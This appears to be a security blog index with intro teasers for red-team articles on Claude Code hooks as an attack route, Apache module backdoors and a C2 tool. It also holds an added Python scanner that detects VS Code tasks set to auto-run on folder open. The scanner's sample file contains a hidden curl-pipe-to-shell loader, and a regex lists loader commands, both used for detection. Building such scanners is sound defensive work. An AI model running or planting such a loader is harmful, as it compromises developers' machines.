Claude Code Hooks as Initial Access & Persistence
DISCLAIMER: This article is intended strictly for educational and research purposes. The techniques, tools, and concepts discussed here are designed to enhance understanding of adversary tactics, improve defensive capabilities, and support authorized Red Team assessments. Any unauthorized or malicious use of the information provided is strongly condemned and may be illegal.
Intro
Do you remember the VSCode task backdoor? The core idea was simple: you can't blindly trust projects you open in your editor. An attacker could embed a surprise in .vscode/tasks.json, and the moment you trusted the workspace, a loader would silently fire in the background and your machine would be compromised. This technique was weaponized by the DPRK-affiliated Lazarus group in its campaigns against IT companies. ...
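The primitive the intro refers to is a VS Code task whose `runOptions.runOn` is set to `"folderOpen"`, which the editor executes once the workspace is trusted. The scanner below is an added example, not code from the article or the Claude Code project: it parses a constructed `tasks.json`, reports every auto-run task, and flags commands that look like a download-and-execute loader. The sample file, the placeholder URL and the `SUSPICIOUS` pattern list are assumptions made for the demo.

```python
"""Added example: find VS Code tasks that auto-run on folder open.

Uses the documented tasks.json fields (runOptions.runOn == "folderOpen");
the sample tasks.json below is constructed for this demo and is not from
the article.
"""
import json
import os
import re
import sys

# Constructed sample: one benign build task and one auto-run task whose
# command pipes a remote script into a shell. The URL is a placeholder.
SAMPLE_TASKS_JSON = r'''{
  "version": "2.0.0",
  "tasks": [
    {
      "label": "build",
      "type": "shell",
      "command": "npm run build",
      "group": "build"
    },
    {
      "label": "prepare",
      "type": "shell",
      "command": "curl -s https://example.invalid/l.sh | sh",
      "presentation": {"reveal": "never"},
      "runOptions": {"runOn": "folderOpen"}
    }
  ]
}'''

# Assumed heuristic: substrings that commonly appear in loader one-liners.
SUSPICIOUS = re.compile(
    r"(curl|wget|Invoke-WebRequest|\biwr\b|powershell|base64|\|\s*(ba)?sh\b)",
    re.I,
)


def strip_json_comments(text: str) -> str:
    """tasks.json is JSONC. Drop block comments and full-line // comments
    (line-start only, so URLs inside strings are left alone)."""
    text = re.sub(r"/\*.*?\*/", "", text, flags=re.S)
    return re.sub(r"^\s*//.*$", "", text, flags=re.M)


def find_autorun_tasks(tasks_json_text: str) -> list:
    """Return every task that fires on folder open, with the resolved
    command line, whether its terminal is hidden, and a loader flag."""
    data = json.loads(strip_json_comments(tasks_json_text))
    findings = []
    for task in data.get("tasks", []):
        if task.get("runOptions", {}).get("runOn") != "folderOpen":
            continue
        parts = [str(task.get("command", ""))]
        parts += [str(a) for a in task.get("args", [])]
        cmd = " ".join(parts).strip()
        findings.append({
            "label": task.get("label", "<unnamed>"),
            "command": cmd,
            "hidden": task.get("presentation", {}).get("reveal") == "never",
            "suspicious": bool(SUSPICIOUS.search(cmd)),
        })
    return findings


def scan_workspace(root: str) -> list:
    """Walk a checkout and scan every .vscode/tasks.json under it
    (nested folders matter for multi-root workspaces)."""
    results = []
    for dirpath, _dirnames, filenames in os.walk(root):
        if os.path.basename(dirpath) == ".vscode" and "tasks.json" in filenames:
            path = os.path.join(dirpath, "tasks.json")
            with open(path, encoding="utf-8") as fh:
                for finding in find_autorun_tasks(fh.read()):
                    results.append({"file": path, **finding})
    return results


if __name__ == "__main__":
    # Pass a checkout path to scan it; with no argument, scan the sample.
    hits = scan_workspace(sys.argv[1]) if len(sys.argv) > 1 else find_autorun_tasks(SAMPLE_TASKS_JSON)
    for hit in hits:
        print(hit)
```

Run it against a freshly cloned repository before trusting the workspace; an auto-run task with `"reveal": "never"` and a network fetch in its command is exactly the shape of the backdoor the intro describes, and is worth reviewing even when the heuristic does not fire.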
Persistent Backdoors via Apache Modules 🕷️
DISCLAIMER: This article is intended strictly for educational and research purposes. The techniques, tools, and concepts discussed here are designed to enhance understanding of adversary tactics, improve defensive capabilities, and support authorized Red Team assessments. Any unauthorized or malicious use of the information provided is strongly condemned and may be illegal.
Intro
While studying APT and Red Team materials, I came across an excellent article from CICADA8 about establishing persistence in infrastructure through IIS modules instead of classic webshells. ...
WMIHacker 2.0 👾
DISCLAIMER: This article is intended strictly for educational and research purposes. The techniques, tools, and concepts discussed here are designed to enhance understanding of adversary tactics, improve defensive capabilities, and support authorized Red Team assessments. Any unauthorized or malicious use of the information provided is strongly condemned and may be illegal.
Table of Contents
Introduction
Earth Kurma Chain
Symmetric & Asymmetric approach in C2 infra
Symmetric C2
Asymmetric C2
WMIHacker 2.0
MITRE ATT&CK mapping
Detection & Response
Conclusion
Introduction
In this article, I will present a reimagined version of the WMIHacker tool, which has been observed in APT campaigns attributed to the Earth Kurma group. The revamped version focuses on advanced command and control (C2) techniques and demonstrates how both symmetric and asymmetric C2 infrastructures can be leveraged in real-world attack scenarios. ...